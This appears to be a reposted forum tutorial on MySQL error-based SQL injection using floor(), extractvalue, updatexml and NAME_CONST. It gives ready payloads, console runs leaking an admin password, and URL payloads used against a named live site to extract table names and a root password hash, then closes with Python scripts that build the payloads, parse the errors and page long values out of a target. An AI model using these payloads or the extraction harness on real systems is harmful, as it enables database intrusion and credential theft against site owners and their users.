Exploiting MySQL's three error-based injection modes: floor, ExtractValue and UpdateXml

Posted by the thread starter on 2015-11-11 19:03:37

1. Errors via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Both forms need a row source with at least three rows, which is why the second one unions three constant rows instead of reading information_schema.tables: rand(0) yields a fixed sequence, and the GROUP BY key is evaluated a second time when a new group is inserted into the temporary table, so the duplicate-key collision only shows up on the third row.

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message (the trailing 1 is the floor(rand(0)*2) value that concat appended). To pull other data, replace version() with the subquery you want; that subquery must return a single row, hence the where id=1 and limit 1 below.
For example, to read the administrator's password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

The 0x5c (backslash) prefix is what makes the XPath expression invalid so that the value is echoed back in the error. extractvalue() and updatexml() exist from MySQL 5.1.5, and the XPATH error shows at most 32 characters of the offending expression, so longer values have to be read in pieces with substr().

3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Further collected material:


Joining two derived tables that each expose a column named after the leaked value raises a 'Duplicate column name' error that carries the value:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: exploiting NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that. Later releases enforce the constant-argument rule and answer a subquery or function call with "Incorrect arguments to NAME_CONST", so expect the trick to fail on most builds newer than the 5.0.27 server used below.

Code:
NAME_CONST(name, value)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+
http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's pull the table names.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'. (0x6d7973716c is 'mysql' and 0x75736572 is 'user' in hex; the hex literals avoid quote characters in the URL.)

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Now to finish the job.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this (0x207e20 is the " ~ " separator):

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
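Why the floor() form of the first section raises the duplicate-key error is easiest to see in code. The following Python is an added example, not part of the original post: it ports MySQL's RAND(seed) generator (randominit()/my_rnd(), seeded the way RAND(N) seeds it, with 0x10001*N+55555555 and 0x10000001*N) and models the GROUP BY temporary table the way the technique is usually explained, that is, the key expression is evaluated once to look a group up and evaluated again when a new group is inserted. That temp-table model and the three-row threshold are the standard explanation, not something the post states; the MySQLRand port and the prefix string are the other assumptions.

```python
"""Added example: why `... group by concat(x, floor(rand(0)*2))` collides.

Assumptions: MySQLRand is a port of MySQL's randominit()/my_rnd() as seeded by
RAND(seed); simulate_group_by() models the GROUP BY temp table as the technique
is commonly explained (key evaluated for the lookup, then again on insert)."""

MAX_VALUE = 0x3FFFFFFF  # max_value set by MySQL's randominit()


class MySQLRand:
    """Port of MySQL's randominit()/my_rnd() as seeded by RAND(seed)."""

    def __init__(self, seed):
        seed &= 0xFFFFFFFF
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(seed=0, n=6):
    """The first n values of floor(rand(seed)*2), in evaluation order."""
    rng = MySQLRand(seed)
    return [int(rng.next() * 2) for _ in range(n)]


def simulate_group_by(prefix, rows, seed=0):
    """Model of `select count(*) from <rows rows> group by concat(prefix, floor(rand(seed)*2))`.

    The key is evaluated once for the lookup and once more when a new group is
    inserted into the temporary table. Returns the group table (dict) when the
    query would succeed, or the MySQL error string when it collides."""
    rng = MySQLRand(seed)
    groups = {}
    for _ in range(rows):
        key = prefix + str(int(rng.next() * 2))  # evaluation for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = prefix + str(int(rng.next() * 2))  # re-evaluated on insert
        if key in groups:
            return "ERROR 1062 (23000): Duplicate entry '%s' for key 'group_key'" % key
        groups[key] = 1
    return groups


if __name__ == "__main__":
    print("floor(rand(0)*2):", floor_rand_sequence(0, 12))
    print("2 rows:", simulate_group_by("5.1.33-community-log", 2))
    print("3 rows:", simulate_group_by("5.1.33-community-log", 3))
```

floor_rand_sequence() gives 0, 1, 1, 0, 1, 1 for rand(0): row 1 looks up prefix0, misses, and inserts prefix1; row 2 finds prefix1; row 3 looks up prefix0, misses, re-evaluates to prefix1 on insert and collides. With only two rows there is no collision, which is why the union-based payload in section 1 supplies exactly three.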
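As a second added example (again not code from the post or from the sites it mentions), a small Python harness that builds the payload shapes discussed on this page (floor, extractvalue, updatexml and the double-NAME_CONST column trick) and recovers the leaked value from each of the three error messages. It also pages through a value longer than the 32-character XPATH error limit with substr() windows. FAKE_ROWS and fake_server() are constructed stand-ins for an injectable endpoint: they only understand the substr/extractvalue shape built here and mimic the 32-character truncation; the 0x7e separator, the made-up mysql.user hash and the run_query callback are assumptions.

```python
"""Added example: payload builders and error parsers for MySQL error-based injection.

Assumptions: 0x7e ('~') as separator, a run_query(payload) -> error-text callback
supplied by the caller, and a constructed fake endpoint (FAKE_ROWS/fake_server)."""
import re

# Error shapes produced by the techniques on this page.
XPATH_ERR = re.compile(r"XPATH syntax error: '(.*)'")
DUP_COL_ERR = re.compile(r"Duplicate column name '(.*)'")
DUP_ENTRY_ERR = re.compile(r"Duplicate entry '(.*)1' for key 'group_key'")

# XPATH errors show at most 32 characters of the bad expression; one of them is
# the '~' separator, so 31 characters of data fit in each request.
WINDOW = 31


def extractvalue_payload(subquery, offset=1):
    return "and extractvalue(1,concat(0x7e,substr((%s),%d,%d)))" % (subquery, offset, WINDOW)


def updatexml_payload(subquery, offset=1):
    return "and updatexml(1,concat(0x7e,substr((%s),%d,%d)),1)" % (subquery, offset, WINDOW)


def floor_payload(subquery):
    return ("and (select 1 from (select count(*),concat((%s),floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)" % subquery)


def name_const_payload(subquery):
    # Two columns carrying the same NAME_CONST name -> 'Duplicate column name'.
    col = "name_const((%s),1)" % subquery
    return "and 1=(select * from (select %s,%s) as x)" % (col, col)


def parse_leak(error_text):
    """Return the leaked fragment from any of the three error messages, or None."""
    m = XPATH_ERR.search(error_text)
    if m:
        return m.group(1).lstrip("~\\:")  # drop the separator (~, \ or :)
    m = DUP_COL_ERR.search(error_text)
    if m:
        return m.group(1)
    m = DUP_ENTRY_ERR.search(error_text)  # the floor() key always ends in '1'
    if m:
        return m.group(1)
    return None


def dump_long_value(subquery, run_query):
    """Read a value longer than 31 characters in successive substr() windows.
    run_query(payload) must return the server's error text."""
    out, offset = "", 1
    while True:
        chunk = parse_leak(run_query(extractvalue_payload(subquery, offset)))
        if not chunk:
            break
        out += chunk
        if len(chunk) < WINDOW:
            break
        offset += WINDOW
    return out


# Constructed stand-in for an injectable endpoint (not a real server or real data).
FAKE_ROWS = {
    "select pass from admin limit 1": "admin888",
    "select concat(user,password) from mysql.user limit 0,1":
        "root*" + "0123456789ABCDEF0123456789ABCDEF01234567",  # made-up 40-hex hash
}


def fake_server(payload):
    """Evaluates only the substr()/extractvalue() shape built above and mimics
    MySQL's 32-character truncation of the XPATH error text."""
    m = re.search(r"substr\(\((.*)\),(\d+),(\d+)\)", payload)
    value = FAKE_ROWS[m.group(1)]
    start, length = int(m.group(2)), int(m.group(3))
    chunk = value[start - 1:start - 1 + length]
    return "ERROR 1105 (HY000): XPATH syntax error: '%s'" % ("~" + chunk)[:32]


if __name__ == "__main__":
    print(floor_payload("select pass from admin where id=1"))
    print(name_const_payload("select table_name from information_schema.tables limit 0,1"))
    for q in FAKE_ROWS:
        print(q, "->", dump_long_value(q, fake_server))
```

Against a real target, run_query is whatever sends the payload and returns the page's error text; the loop stops as soon as a window comes back shorter than 31 characters, so a 45-character user/hash pair takes two requests.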